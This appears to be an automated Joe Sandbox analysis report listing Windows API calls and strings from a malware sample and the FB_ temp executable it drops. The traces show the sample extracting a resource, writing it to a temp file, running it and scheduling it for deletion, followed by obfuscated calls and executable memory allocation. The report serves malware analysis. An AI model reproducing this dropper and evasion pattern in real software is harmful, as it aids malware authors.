Source File: 00000002.00000001.115803017.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.115783238.00400000.00000002.sdmp
Associated: 00000002.00000001.115812009.0045C000.00000004.sdmp
Associated: 00000002.00000001.115815800.0045D000.00000008.sdmp
Associated: 00000002.00000001.115819814.00464000.00000004.sdmp
Associated: 00000002.00000001.115823638.00466000.00000008.sdmp
Associated: 00000002.00000001.115827413.00468000.00000004.sdmp
Associated: 00000002.00000001.115830934.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_1_400000_40D19FBA73C6B011814E2C6920E8792F.jbxd

Analysis Process: 40D19FBA73C6B011814E2C6920E8792F.exe PID: 3388 Parent PID: 3336

Execution Graph

Execution Coverage:	0.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	15
Total number of Limit Nodes:	0

Executed Functions

Function 00401000, Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 119

APIs

FindResourceA.KERNEL32(00000000,?,0000000A), ref: 0040101D
SizeofResource.KERNEL32(00000000,00000000), ref: 00401034
LoadResource.KERNEL32(00000000), ref: 0040103F
LockResource.KERNEL32(00000000), ref: 0040104E
GetTempPathA.KERNEL32(00000104,00000000), ref: 0040109B
GetTempFileNameA.KERNEL32(00000000,FB_,00000000,00000000), ref: 004010B5
MoveFileExA.KERNEL32(?,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 004010CD
sprintf.MSVCRT ref: 004010F5
CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 00401115
WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 0040112E
CloseHandle.KERNEL32(00000000), ref: 00401135
ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0040114D
FreeResource.KERNEL32(?,?,?,00000000), ref: 00401158
MoveFileExA.KERNEL32(?,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 0040116A
ExitProcess.KERNEL32 ref: 00401180

Strings

%s.%s, xrefs: 004010EF
open, xrefs: 00401146
exe, xrefs: 004010CF
FB_, xrefs: 004010AF

Memory Dump Source

Source File: 00000004.00000002.189363552.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_40D19FBA73C6B011814E2C6920E8792F.jbxd

Function 00698210, Relevance: 3.2, APIs: 2, Instructions: 178

APIs

VirtualProtect.KERNELBASE(00400000,00001000,00000004,?,B8555218), ref: 0069838D
VirtualProtect.KERNELBASE(00400000,00001000), ref: 006983A2

Memory Dump Source

Source File: 00000004.00000002.189363552.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_40D19FBA73C6B011814E2C6920E8792F.jbxd

Non-executed Functions

Function 00401187, Relevance: 16.6, APIs: 11, Instructions: 120

APIs

__set_app_type.MSVCRT ref: 004011BD
__p__fmode.MSVCRT ref: 004011D2
__p__commode.MSVCRT ref: 004011E0
__setusermatherr.MSVCRT ref: 0040120C

Part of subcall function 004012FA: _controlfp.MSVCRT ref: 00401304

_initterm.MSVCRT ref: 00401222
__getmainargs.MSVCRT ref: 00401245
_initterm.MSVCRT ref: 00401255
GetStartupInfoA.KERNEL32(?), ref: 00401294
GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 004012B8

Part of subcall function 00401000: FindResourceA.KERNEL32(00000000,?,0000000A), ref: 0040101D
Part of subcall function 00401000: SizeofResource.KERNEL32(00000000,00000000), ref: 00401034
Part of subcall function 00401000: LoadResource.KERNEL32(00000000), ref: 0040103F
Part of subcall function 00401000: LockResource.KERNEL32(00000000), ref: 0040104E
Part of subcall function 00401000: GetTempPathA.KERNEL32(00000104,00000000), ref: 0040109B
Part of subcall function 00401000: GetTempFileNameA.KERNEL32(00000000,FB_,00000000,00000000), ref: 004010B5
Part of subcall function 00401000: MoveFileExA.KERNEL32(?,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 004010CD
Part of subcall function 00401000: sprintf.MSVCRT ref: 004010F5
Part of subcall function 00401000: CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 00401115
Part of subcall function 00401000: WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 0040112E
Part of subcall function 00401000: CloseHandle.KERNEL32(00000000), ref: 00401135
Part of subcall function 00401000: ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0040114D
Part of subcall function 00401000: FreeResource.KERNEL32(?,?,?,00000000), ref: 00401158
Part of subcall function 00401000: MoveFileExA.KERNEL32(?,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 0040116A
Part of subcall function 00401000: ExitProcess.KERNEL32 ref: 00401180

exit.MSVCRT ref: 004012C8
_XcptFilter.MSVCRT ref: 004012DA

Memory Dump Source

Source File: 00000004.00000002.189363552.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_40D19FBA73C6B011814E2C6920E8792F.jbxd

Analysis Process: FB_3449.tmp.exe PID: 3408 Parent PID: 3388

Execution Graph

Execution Coverage:	1.9%
Dynamic/Decrypted Code Coverage:	0.5%
Signature Coverage:	26%
Total number of Nodes:	420
Total number of Limit Nodes:	9

Executed Functions

Function 0045B93C, Relevance: 45.6, APIs: 18, Strings: 8, Instructions: 82

APIs

GetForegroundWindow.USER32 ref: 0045B95E
Sleep.KERNEL32(00000064,00000000,0045BA3F,?,?,?,00000000), ref: 0045B967
GetForegroundWindow.USER32 ref: 0045B96C
OutputDebugStringA.KERNEL32(00000000,00000000,00000000,00000064,00000000,0045BA3F,?,?,?,00000000), ref: 0045B98A
OutputDebugStringA.KERNEL32(w4ZUHcHjWZiye735mOUvnkKZ6XwjXIlyrS,00000000,00000000,00000000,00000064,00000000,0045BA3F,?,?,?,00000000), ref: 0045B998
GetMessageTime.USER32 ref: 0045B99D
GetWinMetaFileBits.GDI32(00000000,00000000,00000000,00000000,00000000), ref: 0045B9AC
GetLastError.KERNEL32(00000000,00000000,00000000,00000000,00000000,w4ZUHcHjWZiye735mOUvnkKZ6XwjXIlyrS,00000000,00000000,00000000,00000064,00000000,0045BA3F,?,?,?,00000000), ref: 0045B9B3
GetTickCount.KERNEL32(00000000,00000000,00000000,00000000,00000000,w4ZUHcHjWZiye735mOUvnkKZ6XwjXIlyrS,00000000,00000000,00000000,00000064,00000000,0045BA3F,?,?,?,00000000), ref: 0045B9BA
LoadLibraryA.KERNEL32(AXLzZmdD9HtbQccvaUl8.dll), ref: 0045B9D2
FindAtomA.KERNEL32(RkLNPKJEBsQUb), ref: 0045B9E5

Part of subcall function 0045B894: GetConsoleCP.KERNEL32 ref: 0045B898
Part of subcall function 0045B894: GetVersion.KERNEL32 ref: 0045B8AF
Part of subcall function 0045B894: OutputDebugStringA.KERNEL32(XL6koNAzf7HqWidOVFHpYcM8w2cTaNFBEa09fFCcuH), ref: 0045B8BE

FindAtomA.KERNEL32(zlVNazAPqdQa7BfpukDLxLZWhw1N0LpNT0PXD1PoRu5EwQ), ref: 0045B9F4
FindAtomA.KERNEL32(XH7Rlw4xvDQkHOCyEVY63qd0UnLACWYtQu9lkF5haLCZaIdSc), ref: 0045B9FE
GetTickCount.KERNEL32(XH7Rlw4xvDQkHOCyEVY63qd0UnLACWYtQu9lkF5haLCZaIdSc,zlVNazAPqdQa7BfpukDLxLZWhw1N0LpNT0PXD1PoRu5EwQ,AXLzZmdD9HtbQccvaUl8.dll,00000000,00000000,00000000,00000000,00000000,w4ZUHcHjWZiye735mOUvnkKZ6XwjXIlyrS,00000000,00000000,00000000,00000064,00000000,0045BA3F), ref: 0045BA03
GetModuleHandleA.KERNEL32(00000000,LUfdbTx4Qp0PQTLTD,XH7Rlw4xvDQkHOCyEVY63qd0UnLACWYtQu9lkF5haLCZaIdSc,zlVNazAPqdQa7BfpukDLxLZWhw1N0LpNT0PXD1PoRu5EwQ,AXLzZmdD9HtbQccvaUl8.dll,00000000,00000000,00000000,00000000,00000000,w4ZUHcHjWZiye735mOUvnkKZ6XwjXIlyrS,00000000,00000000,00000000,00000064,00000000), ref: 0045BA0F
LoadCursorA.USER32(00000000,00000000), ref: 0045BA15
GetTickCount.KERNEL32(00000000,00000000,LUfdbTx4Qp0PQTLTD,XH7Rlw4xvDQkHOCyEVY63qd0UnLACWYtQu9lkF5haLCZaIdSc,zlVNazAPqdQa7BfpukDLxLZWhw1N0LpNT0PXD1PoRu5EwQ,AXLzZmdD9HtbQccvaUl8.dll,00000000,00000000,00000000,00000000,00000000,w4ZUHcHjWZiye735mOUvnkKZ6XwjXIlyrS,00000000,00000000,00000000,00000064), ref: 0045BA1A
lstrlen.KERNEL32(nrv3Luf0WuUHwt0zdItIqYOEpuqSh,00000000,00000000,LUfdbTx4Qp0PQTLTD,XH7Rlw4xvDQkHOCyEVY63qd0UnLACWYtQu9lkF5haLCZaIdSc,zlVNazAPqdQa7BfpukDLxLZWhw1N0LpNT0PXD1PoRu5EwQ,AXLzZmdD9HtbQccvaUl8.dll,00000000,00000000,00000000,00000000,00000000,w4ZUHcHjWZiye735mOUvnkKZ6XwjXIlyrS,00000000,00000000,00000000), ref: 0045BA24

Strings

zlVNazAPqdQa7BfpukDLxLZWhw1N0LpNT0PXD1PoRu5EwQ, xrefs: 0045B9EF
W, xrefs: 0045B9DB
AXLzZmdD9HtbQccvaUl8.dll, xrefs: 0045B9CD
nrv3Luf0WuUHwt0zdItIqYOEpuqSh, xrefs: 0045BA1F
LUfdbTx4Qp0PQTLTD, xrefs: 0045BA08
w4ZUHcHjWZiye735mOUvnkKZ6XwjXIlyrS, xrefs: 0045B993
RkLNPKJEBsQUb, xrefs: 0045B9E0
XH7Rlw4xvDQkHOCyEVY63qd0UnLACWYtQu9lkF5haLCZaIdSc, xrefs: 0045B9F9

Memory Dump Source

Source File: 00000005.00000002.254343766.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.254336544.00400000.00000002.sdmp
Associated: 00000005.00000002.254356116.0045C000.00000004.sdmp
Associated: 00000005.00000002.254363945.0045D000.00000008.sdmp
Associated: 00000005.00000002.254371853.00464000.00000004.sdmp
Associated: 00000005.00000002.254379401.00466000.00000008.sdmp
Associated: 00000005.00000002.254386698.00468000.00000004.sdmp
Associated: 00000005.00000002.254394189.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_FB_3449.jbxd

Function 00405B44, Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000001,0045C08C,?,00405934,00400000,?,00000105,00000001,004101C4,00405970,00406450,0000FF94,?), ref: 00405B60
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,0045C08C,?,00405934,00400000,?,00000105,00000001), ref: 00405B7E
RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,0045C08C), ref: 00405B9C
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405BBA

Part of subcall function 0040598C: GetModuleHandleA.KERNEL32(kernel32.dll,?,00000001,0045C08C,?,00405BEC,00000000,00405C49,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 004059A9
Part of subcall function 0040598C: GetProcAddress.KERNEL32(00000000,GetLongPathNameA,kernel32.dll,?,00000001,0045C08C,?,00405BEC,00000000,00405C49,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 004059BA
Part of subcall function 0040598C: lstrcpyn.KERNEL32(?,?,?,?,00000001,0045C08C,?,00405BEC,00000000,00405C49,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 004059EA
Part of subcall function 0040598C: lstrcpyn.KERNEL32(?,?,?,kernel32.dll,?,00000001,0045C08C,?,00405BEC,00000000,00405C49,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 00405A4E
Part of subcall function 0040598C: lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,?,00000001,0045C08C,?,00405BEC,00000000,00405C49,?,80000001), ref: 00405A83
Part of subcall function 0040598C: FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,0045C08C,?,00405BEC,00000000,00405C49), ref: 00405A96
Part of subcall function 0040598C: FindClose.KERNEL32(00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,0045C08C,?,00405BEC,00000000), ref: 00405AA3
Part of subcall function 0040598C: lstrlen.KERNEL32(?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,0045C08C,?,00405BEC), ref: 00405AAF
Part of subcall function 0040598C: lstrcpyn.KERNEL32(0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001), ref: 00405AE3
Part of subcall function 0040598C: lstrlen.KERNEL32(?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll), ref: 00405AEF
Part of subcall function 0040598C: lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?), ref: 00405B11

RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,00405C49,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00405C03
RegQueryValueExA.ADVAPI32(?,00405DB0,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,00405C49,?,80000001), ref: 00405C21
RegCloseKey.ADVAPI32(?,00405C50,00000000,00000000,00000005,00000000,00405C49,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00405C43
lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 00405C60
GetThreadLocale.KERNEL32(00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 00405C6D
GetLocaleInfoA.KERNEL32(00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 00405C73
lstrlen.KERNEL32(00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 00405C9E
lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405CE5
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405CF5
lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405D1D
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405D2D
lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?), ref: 00405D53
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001), ref: 00405D63

Strings

Software\Borland\Locales, xrefs: 00405B74, 00405B92
Software\Borland\Delphi\Locales, xrefs: 00405BB0

Memory Dump Source

Source File: 00000005.00000002.254343766.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.254336544.00400000.00000002.sdmp
Associated: 00000005.00000002.254356116.0045C000.00000004.sdmp
Associated: 00000005.00000002.254363945.0045D000.00000008.sdmp
Associated: 00000005.00000002.254371853.00464000.00000004.sdmp
Associated: 00000005.00000002.254379401.00466000.00000008.sdmp
Associated: 00000005.00000002.254386698.00468000.00000004.sdmp
Associated: 00000005.00000002.254394189.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_FB_3449.jbxd

Function 00455F9C, Relevance: 28.4, APIs: 13, Strings: 3, Instructions: 392

APIs

Part of subcall function 00455E50: SetThreadLocale.KERNEL32(00000400,?,?,?,0045600F,00000000,0045662C), ref: 00455E73

Part of subcall function 00456690: IsIconic.USER32(00000000), ref: 00456698
Part of subcall function 00456690: SetActiveWindow.USER32(00000000), ref: 004566B0
Part of subcall function 00456690: IsWindowEnabled.USER32(00000000), ref: 004566D3
Part of subcall function 00456690: SetWindowPos.USER32(00000000,00000000,?,?,?,00000000,00000040), ref: 004566FC
Part of subcall function 00456690: DefWindowProcA.USER32(00000000,00000112,0000F020,00000000), ref: 00456711

Part of subcall function 00456740: IsIconic.USER32(?), ref: 00456748
Part of subcall function 00456740: SetActiveWindow.USER32(?), ref: 00456759
Part of subcall function 00456740: IsWindowEnabled.USER32(00000000), ref: 0045677C
Part of subcall function 00456740: DefWindowProcA.USER32(?,00000112,0000F120,00000000), ref: 00456795
Part of subcall function 00456740: SetWindowPos.USER32(?,00000000,00000000,?,?,0045618A,00000000), ref: 004567DB
Part of subcall function 00456740: SetFocus.USER32(00000000), ref: 00456820

Part of subcall function 00456674: LoadIconA.USER32(00000000,00007F00), ref: 0045668A

PostMessageA.USER32(?,0000B001,00000000,00000000), ref: 00456281

Part of subcall function 00455DB4: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000213), ref: 00455E07

PostMessageA.USER32(?,0000B000,00000000,00000000), ref: 0045625F
SendMessageA.USER32(?,?,?,?), ref: 00456315

Part of subcall function 0040B8E4: SetErrorMode.KERNEL32 ref: 0040B8EE
Part of subcall function 0040B8E4: LoadLibraryA.KERNEL32(00000000), ref: 0040B91D

GetProcAddress.KERNEL32(00000000,RegisterAutomation,00000000,0045662C), ref: 004563A4
GetLastError.KERNEL32(00000000,0045662C), ref: 004563CD

Part of subcall function 00456A14: IsWindowEnabled.USER32(00000000), ref: 00456A50

IsWindowEnabled.USER32(00000000), ref: 0045645F
IsWindowVisible.USER32(00000000), ref: 00456474
GetFocus.USER32 ref: 00456488
SetFocus.USER32(00000000), ref: 00456497
SetFocus.USER32(00000000), ref: 004564B6
IsIconic.USER32(?), ref: 00456528
GetFocus.USER32 ref: 00456535

Part of subcall function 0044DEDC: GetCurrentThreadId.KERNEL32(Function_0004DE78,00000000,0045358A,00000000,00000000,004535DD), ref: 0044DEF6
Part of subcall function 0044DEDC: EnumThreadWindows.USER32(00000000,Function_0004DE78,00000000), ref: 0044DEFC

SetFocus.USER32(00000000), ref: 00456556

Part of subcall function 0045707C: PostMessageA.USER32(?,0000B01F,?,?), ref: 0045719D

Part of subcall function 00456B98: SendMessageA.USER32(0004014A,0000B020,00000001,?), ref: 00456BBC

Part of subcall function 00456B3C: SendMessageA.USER32(0004014A,0000B020,00000000,?), ref: 00456B5E

Part of subcall function 00441ED8: SystemParametersInfoA.USER32(00000068,00000000,00433DB0,00000000), ref: 00441F1C
Part of subcall function 00441ED8: SendMessageA.USER32(90C30000,00000000,00000000,00000000), ref: 00441F2F

Part of subcall function 00455F14: DefWindowProcA.USER32(?,?,?,?), ref: 00455F3E

Strings

dKF, xrefs: 004565E1
vcltest3.dll, xrefs: 00456374
RegisterAutomation, xrefs: 00456395

Memory Dump Source

Source File: 00000005.00000002.254343766.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.254336544.00400000.00000002.sdmp
Associated: 00000005.00000002.254356116.0045C000.00000004.sdmp
Associated: 00000005.00000002.254363945.0045D000.00000008.sdmp
Associated: 00000005.00000002.254371853.00464000.00000004.sdmp
Associated: 00000005.00000002.254379401.00466000.00000008.sdmp
Associated: 00000005.00000002.254386698.00468000.00000004.sdmp
Associated: 00000005.00000002.254394189.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_FB_3449.jbxd

Function 00405C50, Relevance: 15.1, APIs: 10, Instructions: 98

APIs

lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 00405C60
GetThreadLocale.KERNEL32(00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 00405C6D
GetLocaleInfoA.KERNEL32(00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 00405C73
lstrlen.KERNEL32(00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 00405C9E
lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405CE5
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405CF5
lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405D1D
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405D2D
lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?), ref: 00405D53
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001), ref: 00405D63

Strings

Software\Borland\Locales, xrefs: 00405B74, 00405B92
Software\Borland\Delphi\Locales, xrefs: 00405BB0

Memory Dump Source

Source File: 00000005.00000002.254343766.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.254336544.00400000.00000002.sdmp
Associated: 00000005.00000002.254356116.0045C000.00000004.sdmp
Associated: 00000005.00000002.254363945.0045D000.00000008.sdmp
Associated: 00000005.00000002.254371853.00464000.00000004.sdmp
Associated: 00000005.00000002.254379401.00466000.00000008.sdmp
Associated: 00000005.00000002.254386698.00468000.00000004.sdmp
Associated: 00000005.00000002.254394189.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_FB_3449.jbxd

Function 0045B794, Relevance: 3.1, APIs: 2, Instructions: 96

APIs

VirtualAlloc.KERNEL32(00000000,000065E4,00003000,00000040), ref: 0045B7ED
GetConsoleCP.KERNEL32 ref: 0045B84B

Memory Dump Source

Source File: 00000005.00000002.254343766.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.254336544.00400000.00000002.sdmp
Associated: 00000005.00000002.254356116.0045C000.00000004.sdmp
Associated: 00000005.00000002.254363945.0045D000.00000008.sdmp
Associated: 00000005.00000002.254371853.00464000.00000004.sdmp
Associated: 00000005.00000002.254379401.00466000.00000008.sdmp
Associated: 00000005.00000002.254386698.00468000.00000004.sdmp
Associated: 00000005.00000002.254394189.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_FB_3449.jbxd

Function 00455A80, Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 130

APIs

Part of subcall function 0041C830: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 0041C84E

GetClassInfoA.USER32(00400000,00455768,?), ref: 00455AD5
RegisterClassA.USER32(0045CC38), ref: 00455AED

Part of subcall function 00406420: LoadStringA.USER32(00000000,0000FF94,?,00000400), ref: 00406451

Part of subcall function 00407100: CreateWindowExA.USER32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00407129

SetWindowLongA.USER32(0000000E,000000FC,10800000), ref: 00455B89
DeleteMenu.USER32(00000000,0000F010,00000000), ref: 00455BFC

Part of subcall function 00456674: LoadIconA.USER32(00000000,00007F00), ref: 0045668A

SendMessageA.USER32(0000000E,00000080,00000001,00000000), ref: 00455BAB
SetClassLongA.USER32(0000000E,000000F2,00000000), ref: 00455BBE
GetSystemMenu.USER32(0000000E,00000000), ref: 00455BC9
DeleteMenu.USER32(00000000,0000F030,00000000), ref: 00455BD8
DeleteMenu.USER32(00000000,0000F000,00000000), ref: 00455BE5

Strings

hKF, xrefs: 00455B8E, 00455BEA
hWE, xrefs: 00455AC9, 00455B60
H@F, xrefs: 00455AA9

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 00442338, Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 103

APIs

GetCurrentProcessId.KERNEL32(?,00000000,004424B0), ref: 00442359
GlobalAddAtomA.KERNEL32(00000000), ref: 0044238C
GetCurrentThreadId.KERNEL32(?,?,00000000,004424B0), ref: 004423A7
GlobalAddAtomA.KERNEL32(00000000), ref: 004423DD
RegisterClipboardFormatA.USER32(00000000), ref: 004423F3

Part of subcall function 00413F7C: RtlInitializeCriticalSection.KERNEL32(0041177C,?,?,00442409,00000000,00000000,?,?,00000000,004424B0), ref: 00413F9B

Part of subcall function 00441F3C: SetErrorMode.KERNEL32(00008000), ref: 00441F55
Part of subcall function 00441F3C: GetModuleHandleA.KERNEL32(USER32,00000000,004420A2,?,00008000), ref: 00441F79
Part of subcall function 00441F3C: GetProcAddress.KERNEL32(00000000,WINNLSEnableIME,USER32,00000000,004420A2,?,00008000), ref: 00441F86
Part of subcall function 00441F3C: LoadLibraryA.KERNEL32(IMM32.DLL), ref: 00441FA2
Part of subcall function 00441F3C: GetProcAddress.KERNEL32(00000000,ImmGetContext,IMM32.DLL,00000000,004420A2,?,00008000), ref: 00441FC4
Part of subcall function 00441F3C: GetProcAddress.KERNEL32(00000000,ImmReleaseContext,00000000,ImmGetContext,IMM32.DLL,00000000,004420A2,?,00008000), ref: 00441FD9
Part of subcall function 00441F3C: GetProcAddress.KERNEL32(00000000,ImmGetConversionStatus,00000000,ImmReleaseContext,00000000,ImmGetContext,IMM32.DLL,00000000,004420A2,?,00008000), ref: 00441FEE
Part of subcall function 00441F3C: GetProcAddress.KERNEL32(00000000,ImmSetConversionStatus,00000000,ImmGetConversionStatus,00000000,ImmReleaseContext,00000000,ImmGetContext,IMM32.DLL,00000000,004420A2,?,00008000), ref: 00442003
Part of subcall function 00441F3C: GetProcAddress.KERNEL32(00000000,ImmSetOpenStatus,00000000,ImmSetConversionStatus,00000000,ImmGetConversionStatus,00000000,ImmReleaseContext,00000000,ImmGetContext,IMM32.DLL,00000000,004420A2,?,00008000), ref: 00442018
Part of subcall function 00441F3C: GetProcAddress.KERNEL32(00000000,ImmSetCompositionWindow,00000000,ImmSetOpenStatus,00000000,ImmSetConversionStatus,00000000,ImmGetConversionStatus,00000000,ImmReleaseContext,00000000,ImmGetContext,IMM32.DLL,00000000,004420A2), ref: 0044202D
Part of subcall function 00441F3C: GetProcAddress.KERNEL32(00000000,ImmSetCompositionFontA,00000000,ImmSetCompositionWindow,00000000,ImmSetOpenStatus,00000000,ImmSetConversionStatus,00000000,ImmGetConversionStatus,00000000,ImmReleaseContext,00000000,ImmGetContext,IMM32.DLL,00000000), ref: 00442042
Part of subcall function 00441F3C: GetProcAddress.KERNEL32(00000000,ImmGetCompositionStringA,00000000,ImmSetCompositionFontA,00000000,ImmSetCompositionWindow,00000000,ImmSetOpenStatus,00000000,ImmSetConversionStatus,00000000,ImmGetConversionStatus,00000000,ImmReleaseContext,00000000,ImmGetContext), ref: 00442057
Part of subcall function 00441F3C: GetProcAddress.KERNEL32(00000000,ImmIsIME,00000000,ImmGetCompositionStringA,00000000,ImmSetCompositionFontA,00000000,ImmSetCompositionWindow,00000000,ImmSetOpenStatus,00000000,ImmSetConversionStatus,00000000,ImmGetConversionStatus,00000000,ImmReleaseContext), ref: 0044206C
